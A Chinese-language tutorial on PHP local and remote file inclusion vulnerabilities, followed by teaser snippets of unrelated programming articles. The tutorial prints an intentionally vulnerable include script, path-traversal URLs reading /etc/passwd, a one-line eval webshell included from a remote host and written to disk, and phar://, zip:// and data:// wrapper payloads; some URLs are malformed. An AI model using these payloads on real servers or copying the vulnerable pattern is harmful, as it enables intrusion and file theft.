当前位置：首页 > news >正文

基于PHP的文件包含介绍

news 2025/6/7 13:59:47

引言：在实际开发过程中，经常会遇到部分模块功能需要重复使用的情况，比如数据库的增删改查，文件包含通过将需要重复使用的功能模块代码引入其他文件的内容，实现重用代码、分离配置等。然而，如果文件包含操作不当，可能会引发所谓的文件包含漏洞，导致安全问题。

一、本地文件包含

这种类型的文件包含漏洞允许攻击者访问本地文件系统上的文件
利用需要满足的条件：

1.php.init中的allow_url_fopen=On(默认开启)
2.用户参数可控且后台代码没有对包含的文件进行过滤

例子：

在127.0.0.1的服务器下的跟目录下存在这样一个文件file_include.php，代码内容如下：

<?php#本地文件包含
#利用条件，php.init中的allow_url_fopen=On(默认开启)
#用户参数可控且后台代码没有对包含的文件进行过滤
$filename = $_GET['filename'];
include $filename;     //或include_once require   require_once
echo "Hello World";
?>

利用方式：

1.将txt的文件内容转换成PHP代码执行

http://127.0.0.1:8082/file_include.php?filename=phpinfo.txt

2.利用文件包含获取系统敏感文件内容

http://127.0.0.1:8082/file_include.php?filename=/etc/passwd

http://127.0.0.1:8082/file_include.php?filename=../../../../../../../etc/passwd

二、远程文件包含

此类型允许攻击者通过包含远程URL来执行代码。

利用需要满足的条件条件

php.init中的allow_url_fopen=On(默认开启)和allow_url_include=Off(默认关闭)要开启
用户参数可控且后台代码没有对包含的文件进行过滤

例子：

在127.0.0.1的服务器下的跟目录下存在这样一个文件file_include.php，代码内容如下：


#远程文件包含
#利用条件，php.init中的allow_url_fopen=On(默认开启)和allow_url_include=Off(默认关闭)要开启 
#用户参数可控且后台代码没有对包含的文件进行过滤
$filename = $_GET['filename'];
include $filename;     //或include_once require   require_once
echo "Hello World";

利用方式：

1.直接包含jd页面，跳转到jd页面

http://127.0.0.1:8082/file_include.php?filename=http://jd.com

2.在远程主机存在一台主机192.168.3.1，包含远程主机/test/shell.php文件，shell.php文件的内容为<?php @eval($_GET['code']);？>

http://127.0.0.1:8082/file_include.php?filename=http:192.168.3.21/test/shell.php?code=phpinfo(); 注意：此时执行的是127.0.0.1的phpinfo（）命令

3.在远程主机存在一台主机192.168.3.1，包含远程主机/test/shell.txt文件，shell.txt文件的内容为<?php @eval($_GET['code']);？> 注意：此时执行的是192.168.3.1的phpinfo（）命令

http://127.0.0.1:8082/file_include.phpfilename=http:192.168.3.1/test/shell.txt&code=phpinfo();

3.在任意服务器上写入一段木马程序

在opt/phpstudy_pro/WWW/test目录下如一句化木马

file_put_contents("opt/phpstudy_pro/WWW/test",'<?php @eval($_GET["code"]);？>');

访问http://127.0.0.1:8082/file_include.php?filename=http:192.168.3.1/test/shell.php?code=phpinfo();

三、伪协议

1.file://伪协议用于访问本地文件系统中的文件。这个伪协议可以直接操作本地文件，包括读取、写入等操作。
2.http:// 和 https:// 伪协议用于发送HTTP请求并获取远程资源的内容。这包括获取网页内容、向远程服务器发送数据等。
3.ftp://伪协议用于访问和操作FTP服务器上的文件。这包括上传、下载、删除等文件操作。
4.php://伪协议用于访问各种输入/输出流。例如，php://input用于读取POST请求的原始数据，php://output用于写入输出缓冲区的数据
5.data://伪协议用于在脚本中直接嵌入数据。这个伪协议允许开发者在代码中直接定义和使用数据，而无需借助外部文件。
6.glob://伪协议用于查找匹配特定模式的文件路径。这对于搜索符合某个通配符规则的文件非常有用
7.phar://伪协议用于操作PHP归档文件。这是一种将多个PHP文件打包成一个单一文件的方式，方便分发和部署。
8.ssh2://伪协议用于通过SSH2协议访问远程资源。这主要用于安全地访问和操作远程服务器上的文件和数据。
9.rar://伪协议用于操作RAR压缩文件。这允许开发者在PHP中直接读取和处理RAR文件。
10.ogg://伪协议用于处理音频流。这允许开发者在PHP中直接读取和操作音频数据流。
11.expect://伪协议用于处理交互式数据流。这允许与需要用户交互的应用程序进行通信，如命令行程序提示输入用户名和密码等情况。

常用的伪协议

1.phar://主要用于在PHP对压缩文件的读取，用法就是把一句话木马压缩成zip格式，shell.txt->shell.zip 将文件上传到服务器目录下

http://127.0.0.1:8082/file_include.php?filename=phar://shell.zip/shell.txt

2.zip:// 原理和phar:// 差不多注意：压缩的/符号要改成#的url编码，也就是%23

// http://127.0.0.1:8082/file_include.php?filename=zip://shell.zip%23shell.txt

3.data:// 本身是数据流封装器，其原理和php://input类似，但是是发送GET请求参数

http://127.0.0.1:8082/file_include.php?filename=data://test/plain,<?php phpinfo(); ?>

基于PHP的文件包含介绍

引言：在实际开发过程中，经常会遇到部分模块功能需要重复使用的情况，比如数据库的增删改查，文件包含通过将需要重复使用的功能模块代码引入其他文件的内容，实现重用代码、分离配置等。然而，如果文件包含操作…...

编程日记 2024/8/23 11:11:31

K7系列FPGA多重启动(Multiboot)

Xilinx 家的 FPGA 支持多重启动功能（Multiboot），即可以从多个 bin 文件中进行选择性加载，从而实现对系统的动态更新，或系统功能的动态调整。这一过程可以通过嵌入在 bit 文件里的 IPROG 命令实现上电后的自动加载。而…...

编程日记 2024/8/23 11:08:23

关于武汉芯景科技有限公司的RS232通信接口芯片XJ3243EEUI开发指南(兼容MAX3243EEUI)

一、芯片引脚介绍 1.芯片引脚 2.引脚描述二、典型应用电路三、功能描述 1.Transmitter 通过T1，T2可以将TTL电平转换为RS232电平 2.Receiver 通过R1，R2可以将RS232电平转换为TTL电平 3.工作模式控制 4.INVALID引脚...

编程日记 2024/8/23 11:07:10

TreeSize Free：你的免费磁盘空间管理专家

TreeSize Free是一款专为Windows用户设计的磁盘空间分析工具。它能够帮助用户快速识别并管理那些占用大量空间的文件夹和文件。功能亮点快速扫描：TreeSize Free能够迅速扫描整个磁盘卷，展示所有文件夹及其子文件夹的大小，甚至可以细化到单…...

编程日记 2024/8/23 10:59:52

python办公自动化：初识`python-docx`

1.1 什么是python-docx python-docx是一个用于在Python中创建和操作Word文档的库。它提供了一组简洁的API，让开发者可以轻松地生成、修改、和读取Microsoft Word (.docx)文件，而不需要安装Microsoft Office。这使得python-docx成为办公自动化、报告生成…...

编程日记 2024/8/23 10:58:50

LeetCode 算法：划分字母区间 c++

原题链接🔗：划分字母区间难度：中等⭐️⭐️ 题目给你一个字符串 s 。我们要把这个字符串划分为尽可能多的片段，同一字母最多出现在一个片段中。注意，划分结果需要满足：将所有划分结果按顺序连接&#…...

编程日记 2024/8/23 10:56:26

PMP备考指南：策略、时间安排与心得分享

准备和时间安排，我是工作的时间把它顺便考了，大约花了一个月左右时间备考，前面的时间都在筹办婚礼，根本没时间，最后一个月都差点想放弃了，但想想还是冲一把就没有选择延考。干货见下： ▌&…...

编程日记 2024/8/23 10:55:25

CentOS上通过frp实现HTTPS访问内网

要在CentOS上通过frp实现HTTPS访问内网，你需要按照以下步骤操作： 在外网服务器上安装frps（frp服务端）。在外网服务器上配置frps，编辑配置文件frps.ini。在frps服务器上启动frps服务。在内网服务器上安装frpc&…...

编程日记 2024/8/23 10:53:18

短视频SDK解决方案，高效集成，助力商业变现

美摄科技，作为业界领先的多媒体技术服务商，其全面升级的短视频SDK解决方案，旨在为开发者与内容创作者提供一站式、高效能的创作工具，让每一个灵感都能瞬间转化为触动人心的视频作品。【一站式解决方案，重塑短视频创作…...

编程日记 2024/8/23 10:52:16

C++系列-继承方式

继承方式继承的语法继承方式：继承方式的特点继承方式的举例继承可以减少重复的代码。继承允许我们依据另一个类来定义一个类，这使得创建和维护一个应用程序变得更容易。基类父类，派生类子类，派生类是在继承了基类的部分成员基础…...

编程日记 2024/8/23 10:51:04

web前端之选项卡的实现、动态添加类名、动态移除类名、动态添加样式、激活、间距、tabBar

MENU 原生(一)原生(二)vue(一) 原生(一) 效果图 html 代码 <div class"card"><div class"tab_bar"><div class"item" onclick"handleTabBar(this)">tabBar1</div><div class"item" onclick&qu…...

编程日记 2024/8/23 10:48:57

sql 优化，提高查询速度

文章目录一、前言二、建议2.1 使用索引2.2 避免使用select *2.3. 使用表连接代替子查询2.4. 优化WHERE子句，减少返回结果集的大小2.5 用union all代替union2.6 使用合适的聚合策略2.7 避免在WHERE子句中使用函数2.8 使用EXPLAIN分析查询2.9 小表驱动大表2.10 使用窗…...

编程日记 2024/8/23 10:40:33

springboot后端开发-自定义参数校验器

背景在使用springboot进行后端开发的时候，经常会遇到数据校验的问题， 有时候可能默认的校验器不足以满足自己的需求， 这个时候就需要开发一个自己的校验器在 Spring Boot 中自定义参数校验器通常涉及以下几个步骤： 1. 定义注解…...

编程日记 2024/8/23 10:39:09

springboot社区帮扶对象管理系统论文源码调试讲解

第2章开发环境与技术社区帮扶对象管理系统的编码实现需要搭建一定的环境和使用相应的技术，接下来的内容就是对社区帮扶对象管理系统用到的技术和工具进行介绍。 2.1 MYSQL数据库本课题所开发的应用程序在数据操作方面是不可预知的，是经常变动的&…...

编程日记 2024/8/23 10:36:04

EmguCV学习笔记 VB.Net 6.2 轮廓处理

编程日记 2024/8/23 10:33:56

【Python的魅力】：利用Pygame实现游戏坦克大战——含完整源码

文章目录一、游戏运行效果二、代码实现2.1 项目搭建2.2 加载我方坦克2.3 加载敌方坦克2.4 添加爆炸效果2.5 坦克大战之音效处理三、完整代码一、游戏运行效果二、代码实现坦克大战游戏 2.1 项目搭建本游戏主要分为两个对象，分别是我方坦克和敌方坦克。用户可…...

编程日记 2024/8/23 10:29:47

【机器学习】经典CNN架构

🌈个人主页: 鑫宝Code 🔥热门专栏: 闲话杂谈｜ 炫酷HTML | JavaScript基础 💫个人格言: "如无必要，勿增实体" 文章目录经典CNN架构1. 引言2. LeNet3. AlexNet4. VGGNet5. GoogLeNet(Inception)6. Res…...

编程日记 2024/8/23 10:28:35

图像数据处理21

五、边缘检测 5.2基于二阶导数的边缘检测一阶导数（如Sobel、Prewitt算子）能够捕捉到灰度值的快速变化，但有时会因检测到过多的边缘点而导致边缘线过粗。为了更加精确地定位边缘位置，可以利用二阶导数的零交叉点。零交叉点是是函…...

编程日记 2024/8/23 10:25:29

day37动态规划+三.Github链接本地仓库

一.动态规划 474.一和零给你一个二进制字符串数组 strs 和两个整数 m 和 n 。请你找出并返回 strs 的最大子集的长度，该子集中最多有 m 个 0 和 n 个 1 。如果 x 的所有元素也是 y 的元素，集合 x 是集合 y 的子集。思路:这道题更像是另一种的0-…...

编程日记 2024/8/23 10:24:10

设备运维故障排查与修复技巧

运维中最常见的40个故障问题及其解决方法： 1. 网络不通问题：无法访问网络资源。解决方法：检查物理线路、交换机端口、网卡驱动和配置，使用ping、traceroute等工具定位问题。 2. 网络速度慢问题：访问网络资源速度慢。解决方法：分析带宽使用情况，检查是否存在广播风…...

编程日记 2024/8/23 10:21:06

设置应用程序图标

(1)找一张图片 (2)然后转ico图片在线生成透明ICO图标——ICO图标制作验证16x16就可以降低exe大小 (3) 在xxx.pro修改添加 （4） 删除 build 和 xxxpro_user文件 (5)编译project 和运行xx.exe (6)右键设置快捷方式...

编程新知 2025/6/7 13:08:30

FPGA没有使用的IO悬空对漏电流有没有影响

结论： 1.在FPGA中，没有使用的IO悬空确实是可能对漏电流和功耗产生一定的影响。 2.这种影响特别是在低功耗设计中或者电流敏感的应用中需要注意。问题一：未连接 IO（Floating IO）会不会产生漏电流？ 1.会有影…...

编程新知 2025/6/7 10:40:50

抽象工厂模式深度解析：从原理到与应用实战

作者简介我是摘星，一名全栈开发者，专注 Java后端开发、AI工程化与云计算架构领域，擅长Python技术栈。热衷于探索前沿技术，包括大模型应用、云原生解决方案及自动化工具开发。日常深耕技术实践，乐于分享实战经验与…...

编程新知 2025/6/7 5:43:23

C语言标准I/O函数全面指南

C标准I/O函数全面指南本指南详细介绍了C语言中用于文件操作的标准输入/输出函数，包括单字符I/O、字符串I/O、格式化I/O、块I/O以及文件光标操作。每个部分包含函数定义、使用说明和实用示例，适合学习、复习以及博客发布。内容采用清晰的Markdown格式&a…...

编程新知 2025/6/7 3:21:51

2025年06月05日Github流行趋势

项目名称：onlook 项目地址url：https://github.com/onlook-dev/onlook项目语言：TypeScript历史star数：16165今日star数：1757项目维护者：Kitenite, drfarrell, spartan-vutrannguyen, apps/devin-ai-integrat…...

编程新知 2025/6/7 2:49:44

Tailwind CSS 实战：基于 Kooboo 构建 AI 对话框页面（七）：消息框交互功能添加

Tailwind CSS 实战，基于Kooboo构建AI对话框页面（一） Tailwind CSS 实战，基于Kooboo构建AI对话框页面（二）：实现交互功能 Tailwind CSS 实战，基于 Kooboo 构建 AI 对话框页面&#x…...

编程新知 2025/6/7 1:00:45

构建 MCP 服务器：第一部分 — 资源入门

什么是模型上下文协议？模型上下文协议(MCP) 是Claude等大型语言模型 (LLM) 与外部数据和功能安全交互的标准化方式。您可以将其想象成一个平视显示器，或者 AI 的 USB 端口——它提供了一个通用接口，允许任何兼容 MCP 的 LLM 连接到您的数据和工具。 MCP 提供了一个集中式协…...

编程新知 2025/6/6 22:52:18